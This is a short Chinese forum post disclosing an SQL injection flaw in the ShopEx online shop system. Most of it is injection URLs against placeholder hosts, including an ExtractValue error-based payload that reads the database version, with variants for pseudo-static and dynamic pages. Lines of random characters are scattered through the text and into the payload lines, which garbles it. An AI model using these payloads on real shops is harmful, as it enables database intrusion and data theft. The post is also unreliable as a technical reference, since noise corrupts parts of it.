注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… " L( I1 Q7 h7 s. K [/ R
6 y8 a5 [0 n; ~% W8 R& |7 ^% z
好吧,我扯远了~~' O6 Y4 S' x% m8 V O7 ~& S
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~& Y C- J6 Q2 v! {7 r6 o
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
3 w1 E" f- U6 ?' ^6 R g3 Y4 F- w+ [3 l4 x `
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
" C% p( B( A. M q% |
/ a2 b# E( B" s+ N; ^5 N% e* Nhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html . f+ {7 b6 j8 c
, ^% r: B, m& F* y1 V% |" K2 ~
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
D% e* m+ g( Z3 y# g2 C, E* N: h9 @& c
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
: ~1 O8 `+ [: L; Y* B/ I9 l) x( W- p- F U0 X, v1 b* U4 H
; J" m8 z! B! O- U* L2 o( o一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
0 q" p; z$ T* `" q如何注入就不多说了,10多年的东西了…不会也会了…
' n& C/ u/ Y! v' H7 d% E
4 l0 a$ P6 M& x; W8 h9 G3 M. t- u
" ^; n; ^4 o- Q" x9 O
* h4 Y: \$ m" ^; G/ X |